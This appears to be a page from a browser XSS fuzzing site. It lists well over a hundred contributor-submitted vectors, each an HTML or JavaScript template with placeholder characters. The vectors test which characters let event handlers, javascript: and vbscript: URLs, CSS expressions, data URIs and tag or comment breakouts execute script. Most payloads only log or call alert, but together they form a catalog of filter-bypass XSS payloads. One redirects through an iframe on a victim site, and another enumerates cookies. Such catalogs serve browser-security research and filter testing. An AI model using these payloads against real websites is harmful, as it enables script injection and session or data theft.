Featured vector

Default Browser 0.0
<!-- sample vector --> <img0x0csrc0x0conerror=alert(1)>

Fuzz vector cloud

Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string style svg tag tags test testing uri vbscript xml

3,403,239 Successful fuzzes

Fuzz Vectors

Searching for "XSS"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
characters that can assign values to attributes <img src*chr*x onerror*chr*logChr(*num*)> @molenzwiebel
close tag construction unicode <script> logChr(*num*)<*uni*script> @_ttffdd_
close tag construction <script>logChr(*num*)<*raw1*script> @_ttffdd_
chars allowed between js commentmm <script>/*chr*/'</script> @hyeim8
Saf2 *chr*>*chr*<*chr*img *chr*src=1 onerrror=logChr(*num*)*chr*>*chr* --> @ahpaleus
Safari *chr*>*chr*<*chr*img *chr*src=1 onerrror=alert(1)*chr*>*chr* --> @ahpaleus
XSS without par <script>alert*chr*logChr(*num*)*chr*</script> @ahpaleus
xss 5 <script>a*uni**uni*lert(*chr*logChr(*num*))</script> @ahpaleus
xss 4 <*chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr*script>alert*raw1*(logChr(*num*))</script> @ahpaleus
svg xss 2 <>*chr*script*chr*+alert(logChr(*num*)) </script> @ahpaleus
svg xss <script*chr*+>alert(logChr(*num*)) </script> @ahpaleus
SVG test 3 *chr*><svg/*chr*onload*chr**chr**chr*=*chr**chr**chr*logChr(*num*)*raw1*><svg/*chr**datahtmlattributes**chr**chr**chr*=*chr**chr**chr*logChr(*num*)*raw1*> @ahpaleus
SVG char <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <svg*chr**chr**chr**chr**chr*onload=logChr*chr**chr**num**chr**chr*><svg*chr**chr**chr**chr**chr**datahtmlattributes*=logChr*chr**chr**num**chr**chr*> @ahpaleus
New test 12 <!-- sample vector --> <*chr**chr**chr**chr*svg/*chr*onload=alert(*num*)*chr*> @ahpaleus
On Event Header Based Testing <img src=x *chr*onError="javascript:log(*num*)"/> @1baicai1
Equal <img src="about:blank" onerror*chr*logChr(*num*)> @synackozgur
Characters used for event handlers instead of equal sign <img src*chr*"about:blank"> @synackozgur
charsThatCloseAMutatedComment <script> t = document.createElement('template'); t.innerHTML = '</*chr*<img src=xx:xx onerror=log(*num*)>'; document.body.appendChild(t); </script> @salchoman
allowed characters in entities <a id="fuzzelement*num*" href="javascript&col*chr*on;alert">aaa</a> <script> if(document.getElementById('fuzzelement*num*').protocol==='javascript:'){ logChr(*num*); } </script> @insertScript
eating char (please god help ) <!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)> @missoum1307
eating char <!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)> @missoum1307
doc property hijack with iframe v3 <script> var testpad = document.createElement("iframe"); testpad.name="dummy"; document.body.appendChild(testpad); for(props in document){ testpad.name = props; if (document[props]+"" === "[object Window]") { customLog(props) } } </script> @insertScript
overwrite cookies test case <*datahtmlelements* name="cookie"></*datahtmlelements*> <script> window.addEventListener("load",function(){ for(a in document.cookie){ customLog(document.cookie[a].tagName); } },false); </script> @insertScript
Comma analog in script src data <script src=data:*chr*logChr(*num*)></script> @i_bo0om
Characters that break out of css urls latest <div id="fuzzelement*num*" style="background:url(about:blank?*chr*;color:#000000;x:);"></div> @garethheyes
Characters that end script tags <script*chr*test>logChr(*num*)</script> @JohnathanKuskos
Characters allowed before tagname in IE v2 <*chr*div style="x:expression(logChr(*num*))"> @albinowax
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
Characters allowed at the start of a namespace <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> @agasfasgasdasds
rand chr after opening tag <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> @mehimansu
prompt <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @sharath_unni
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
svg animate onbegin <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> @JohnathanKuskos
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
object data separator <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> @i_bo0om
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
fssadf dfads fdasf <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @phpdevops
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
im fish <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @Mramydnei
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
chars allowed between js comment v2 <script>logChr(*num*)*chr*'</script> @insertScript
chars allowed between js comment <script>logChr(*num*)/*chr*/'</script> @insertScript
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes